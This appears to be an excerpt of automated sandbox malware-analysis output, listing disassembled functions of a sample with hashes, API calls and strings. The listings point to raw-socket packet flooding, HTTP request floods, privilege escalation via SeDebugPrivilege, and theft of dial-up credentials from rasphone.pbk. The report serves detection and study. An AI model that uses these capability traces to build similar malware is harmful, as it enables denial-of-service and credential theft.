                        • Instruction ID: 92aa19dba737e3a1879c1bf67109f93aef0cce563a7ce5c4c76251157ad9806a
                        • Opcode Fuzzy Hash: 3651d9f7e06f2ce156b862a2aed4741a4c178c6a0e2ab6cecd90e2bd08ab8ec0
                        • Instruction Fuzzy Hash: 3551D03143BF2581C7D3EA34D5A0E62E350FF99394F260D9EC854A6018EB3EE9DEA110
                        Function 1002D4D0 Relevance: .1, Instructions: 149COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9e6ed183020689fc5b77d424512bfdb244793c10d7f01fc1aa1aac10cd57edcb
                        • Instruction ID: 11e796c15fde1ebc30421b1dffbe537e0113c9ca3ce92a4ad6d2fce8dc22ab67
                        • Opcode Fuzzy Hash: 9e6ed183020689fc5b77d424512bfdb244793c10d7f01fc1aa1aac10cd57edcb
                        • Instruction Fuzzy Hash: 7251F13103BF3981D7C3FA30D1A0E62E350FF45398F660E8EC864A6016EB2EA5DE6114
                        Function 10029920 Relevance: .1, Instructions: 138COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8fa1b721c106cfa8795f72f7e25559a4d9a620802d706a15f5f9dccef57f868
                        • Instruction ID: a424cbe496111ca30f3b9a558636deb5faf96912211104fcca9543ea9c2881c0
                        • Opcode Fuzzy Hash: e8fa1b721c106cfa8795f72f7e25559a4d9a620802d706a15f5f9dccef57f868
                        • Instruction Fuzzy Hash: 7241E67251AB514FD783DE78C9C0716FBE1FFD9216F08CA2CA48483695E37E944D8611
                        Function 10023DC0 Relevance: .1, Instructions: 132COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 05c00fb20bc3f5e21c33644035468a27a46b7cbca77c68b83ea58270111a94ac
                        • Instruction ID: 56fd89a21b523641059311b631cf3a291f3f9a5f3225170cd3893f134170cd3d
                        • Opcode Fuzzy Hash: 05c00fb20bc3f5e21c33644035468a27a46b7cbca77c68b83ea58270111a94ac
                        • Instruction Fuzzy Hash: B441EB7023AF728EDBC7EE309140951F3A1BF5621B70509AAC515DF531EB3E934EA220
                        Function 1001F250 Relevance: .1, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8e2000763fa4f3936231de74eaa5d61156017cdcaf0baa27810d9cb11566c53d
                        • Instruction ID: 913474417bdb63703fee607031e41891a829f3e555af09f2b0f060ad52a81739
                        • Opcode Fuzzy Hash: 8e2000763fa4f3936231de74eaa5d61156017cdcaf0baa27810d9cb11566c53d
                        • Instruction Fuzzy Hash: A841AA60239FB38DDBD3EE709100811E3A1BF9621EB054AAAC518DF531DF7E934EA250
                        Function 100418A0 Relevance: .1, Instructions: 99COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 057ac228af4499b6548636333bc42ef776df39a229cc3ccd84fa5c527e1d4dd9
                        • Instruction ID: 4102e0dc4c6f56682c38a11b64a1017c1b57d753f418acc6e60e8161d7d5097d
                        • Opcode Fuzzy Hash: 057ac228af4499b6548636333bc42ef776df39a229cc3ccd84fa5c527e1d4dd9
                        • Instruction Fuzzy Hash: BC3110116CD7854BC305DBF95C90597FFD28EEE014B8EC5BC8AC84B753E89AA40A8295
                        Function 1001E9B0 Relevance: .1, Instructions: 91COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c65b5827016bec97a1c14beb4d3309b1d6a578dc1bab30ca531c6ab092a7d39
                        • Instruction ID: c79e0109b1a1862349d5608c1fb25451e689da49f3a081d00026d06ad5859704
                        • Opcode Fuzzy Hash: 9c65b5827016bec97a1c14beb4d3309b1d6a578dc1bab30ca531c6ab092a7d39
                        • Instruction Fuzzy Hash: 0321BC21036F3586C7D3AA788204C13F7E0FF86259B190E59C944EB465DB3FE58FA210
                        Function 10026D20 Relevance: .1, Instructions: 86COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4162b8fd09a8058dfffab31c4ebf9cf9939f72c70a79160d24adbb6f6ac3f189
                        • Instruction ID: f19503adbb9ab476a7ff647b62535126f56c0b46722e8e2390c857a4e4962fb6
                        • Opcode Fuzzy Hash: 4162b8fd09a8058dfffab31c4ebf9cf9939f72c70a79160d24adbb6f6ac3f189
                        • Instruction Fuzzy Hash: AA11BFB6B68E0B0AFB0C15ACEC397793683C388314F1A9B3C670BD72C0DDAD59481254
                        Function 1002D800 Relevance: .1, Instructions: 85COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6f3ae05bc2f11d7196350307aee4814e94dc49a71f6205255a42e8b9c72dd337
                        • Instruction ID: 6719f5546af8989624b7c04d1671806f77db9f069291f8d98e2163945e6143d4
                        • Opcode Fuzzy Hash: 6f3ae05bc2f11d7196350307aee4814e94dc49a71f6205255a42e8b9c72dd337
                        • Instruction Fuzzy Hash: 7721BE2003AF3541D7C3EBB48644E23F391FF49259F194E558900DA895EB3FC09F6225
                        Function 1001BC00 Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dbda40e0fedf8c57a69035b3b4ad4e1e580b1dae223d415dd98f24015794ea53
                        • Instruction ID: 14cbd0adc733db37fd92e0424bdb4b205cd4c48876b1d47d8e190c929d60320e
                        • Opcode Fuzzy Hash: dbda40e0fedf8c57a69035b3b4ad4e1e580b1dae223d415dd98f24015794ea53
                        • Instruction Fuzzy Hash: A431A06AC30FA940E213833C9912373D710AFF7384E26D39BB99536801FB2191D66254
                        Function 1001BB00 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d98a67032cf16dcf2f85d72cd77508490ebee40dfb0708bdaa806392988a384
                        • Instruction ID: 940837596b89f34f1cfc975e90b30fbd49e05de334376b5cc0ea8a990b323dca
                        • Opcode Fuzzy Hash: 9d98a67032cf16dcf2f85d72cd77508490ebee40dfb0708bdaa806392988a384
                        • Instruction Fuzzy Hash: 16216DA243BF7A84D7C38674C660E27D390FF55389F550E5A9041E6404EB7EE5EE7110
                        Function 10005A50 Relevance: 70.4, APIs: 34, Strings: 6, Instructions: 417stringnetworksleepCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: htons$strcspn$strstr$inet_addr$strncpy$htonlsetsockopt$CountSleepSocketTickprintfrandsendtowsprintf
                        • String ID: %d.%d.%d.%d$192.168.1.244$@$E$P$http://
                        • API String ID: 322722939-1061493658
                        • Opcode ID: 88db1b36f3eb301efdb41fc62d3fa8198337ca217daf7d54b272197523c24133
                        • Instruction ID: 23144e578ce021ea56cee27fd48e3bd0ae5956796406c89bdd2b6830f6d4f4c0
                        • Opcode Fuzzy Hash: 88db1b36f3eb301efdb41fc62d3fa8198337ca217daf7d54b272197523c24133
                        • Instruction Fuzzy Hash: FBE1F5715083849AE720CB70CC45BABB7E5FFC4344F01491DFA9997291DBB4A909CB9B
                        Function 10005360 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 293stringnetworkthreadCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • %s, xrefs: 1000559D
                        • http://, xrefs: 10005384, 100053D5, 100053E4
                        • %s, xrefs: 100055FA
                        • GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-, xrefs: 100055E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: strcspn$printfstrstr$ExitThreadUserclosesocketstrncpy$Sleepinet_addr$connectgethostbynamehtonsinet_ntoasendsocketsprintf
                        • String ID: %s$%s$GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-$http://
                        • API String ID: 3360081097-1844242639
                        • Opcode ID: 4ab37b82d90b89817f1130d551c92f361d4ba8046c45203585236e7034c1653e
                        • Instruction ID: 6f757cc5596c7f890a92da36cce62d5eaa199ef62977ec8daf946ee485bc54ab
                        • Opcode Fuzzy Hash: 4ab37b82d90b89817f1130d551c92f361d4ba8046c45203585236e7034c1653e
                        • Instruction Fuzzy Hash: C89109321003545BE314DB74CC48AAB77EAEFC9350F048A18FA8693290DFB5DE49C796
                        Function 10006120 Relevance: 63.3, APIs: 34, Strings: 2, Instructions: 306stringnetworkthreadCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: strcspn$strstr$printfstrncpy$CountExitThreadTickUserinet_addr$CleanupSleepSocketclosesocketgethostbynameinet_ntoarandsendtosetsockoptsrandtime
                        • String ID: %s$http://
                        • API String ID: 2910787541-1591606595
                        • Opcode ID: 86604f1dfe52b7e799b10680d1a30b6a9bbefe4963d3d6964d515e1a4d0e576d
                        • Instruction ID: 1bc25aea4507e88b03b807ec06dd1f50d7627ba6635f181b4873a055164b222c
                        • Opcode Fuzzy Hash: 86604f1dfe52b7e799b10680d1a30b6a9bbefe4963d3d6964d515e1a4d0e576d
                        • Instruction Fuzzy Hash: EEA107315043506BE354DB74CC44AAB7BEAFFC8350F404A2DF69687290EFB59908CB96
                        Function 10011AC0 Relevance: 61.6, APIs: 33, Strings: 2, Instructions: 327stringsleepprocessCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 10012110: GetCurrentProcess.KERNEL32(00000028,?,?,10009E80,?,00000000,00000000,00000001), ref: 10012120
                          • Part of subcall function 10012110: OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00001F40,00001F40), ref: 10011B66
                        • LocalAlloc.KERNEL32 ref: 10011B94
                        • Sleep.KERNEL32(00000001), ref: 10011BA9
                        • Process32First.KERNEL32(00000000,?), ref: 10011BB8
                        • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?), ref: 10011BDB
                        • EnumProcessModules.PSAPI(00000000,00000040,00000004,?,?,00000000,?), ref: 10011C15
                        • GetModuleFileNameExA.PSAPI(00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011C2D
                        • GetPriorityClass.KERNEL32(00000000,00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011C39
                        • wsprintfA.USER32 ref: 10011CCF
                        • lstrlen.KERNEL32(?,?,?,?,00000002,00000000,00001F40,00001F40), ref: 10011D05
                        • lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011D0E
                        • lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011D17
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$lstrlen$Open$AllocClassCreateCurrentEnumFileFirstLocalModuleModulesNamePriorityProcess32SleepSnapshotTokenToolhelp32wsprintf
                        • String ID: SYSTEM$SeDebugPrivilege
                        • API String ID: 1285126458-3052852743
                        • Opcode ID: cadeee9a5e2820c0af49ea328f1374500f2b17df7cea98c9d96a0cb35abb7eb5
                        • Instruction ID: d154a38f26d894026ef36b3ba2938c2b01a41688b9bbe616a0cc2585f5df2313
                        • Opcode Fuzzy Hash: cadeee9a5e2820c0af49ea328f1374500f2b17df7cea98c9d96a0cb35abb7eb5
                        • Instruction Fuzzy Hash: 94B192716083459FE715DB24CC81AEFB3E6FBC4704F404A2CFA8597240EA79E949CB96
                        Function 100065E0 Relevance: 52.8, APIs: 28, Strings: 2, Instructions: 263stringnetworkthreadCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: strcspn$strstr$strncpy$ExitThreadUserinet_addr$Sleepclosesocketgethostbynamehtonsprintfrandsendtosocketsrandtime
                        • String ID: %s:%d$http://
                        • API String ID: 3986318173-1702654977
                        • Opcode ID: 4a1080f91223798ebd142b12136c7072a719d38d081efe28d831db6d46336a97
                        • Instruction ID: 90b36a3bd682306f4a117e064a3fd4b30ecd2e8c0df95ca9b29892d3dab6f999
                        • Opcode Fuzzy Hash: 4a1080f91223798ebd142b12136c7072a719d38d081efe28d831db6d46336a97
                        • Instruction Fuzzy Hash: 128127315043505BE304DB748C88AAB7BEAEFC8354F048A1DFA9693290DFB5DE08C795
                        Function 10004520 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 227networksleepthreadCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: rand$htons$inet_addrsetsockopt$ExitSleepSocketStartupThreadUserhtonlsendtosprintf
                        • String ID: %d.%d.%d.%d$@$E$P
                        • API String ID: 872198723-1098802344
                        • Opcode ID: 33de09a9403d8de389e9fdb54a7ceb08891698b7f3ea9059b18b1a0a33c038fa
                        • Instruction ID: 4c19716b2acf436438f05bd1e09d835f5a48b7f7dcfd486cac9719d8a7d1c512
                        • Opcode Fuzzy Hash: 33de09a9403d8de389e9fdb54a7ceb08891698b7f3ea9059b18b1a0a33c038fa
                        • Instruction Fuzzy Hash: 7B81BE70148381AAE350DF24CC45BAFB7E6FFC9704F00891DF699972A1DAB49909CB5B
                        Function 10007640 Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 223stringCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000105), ref: 10007659
                        • strchr.MSVCRT ref: 1000766E
                        • lstrcpy.KERNEL32(00000001), ref: 10007679
                        • lstrcat.KERNEL32(?,?), ref: 10007691
                        • lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 100076A0
                        • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 100076B0
                        • wsprintfA.USER32 ref: 100076D0
                        • GetVersionExA.KERNEL32 ref: 100076FC
                        • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 10007722
                        • GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,?), ref: 10007758
                        • GetPrivateProfileStringA.KERNEL32(00000000,DialParamsUID,00000000,?,00000100,?), ref: 100077D5
                        • lstrcmp.KERNEL32(?,00000000), ref: 100077FA
                        • lstrcpy.KERNEL32(?,00000200), ref: 10007835
                        • lstrcpy.KERNEL32(?,00000100), ref: 1000784A
                        • GetPrivateProfileStringA.KERNEL32(00000000,PhoneNumber,00000000,?,00000100,?), ref: 1000787E
                        • GetPrivateProfileStringA.KERNEL32(00000000,Device,00000000,?,00000100,?), ref: 10007896
                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,00000000,?,?), ref: 100078E5
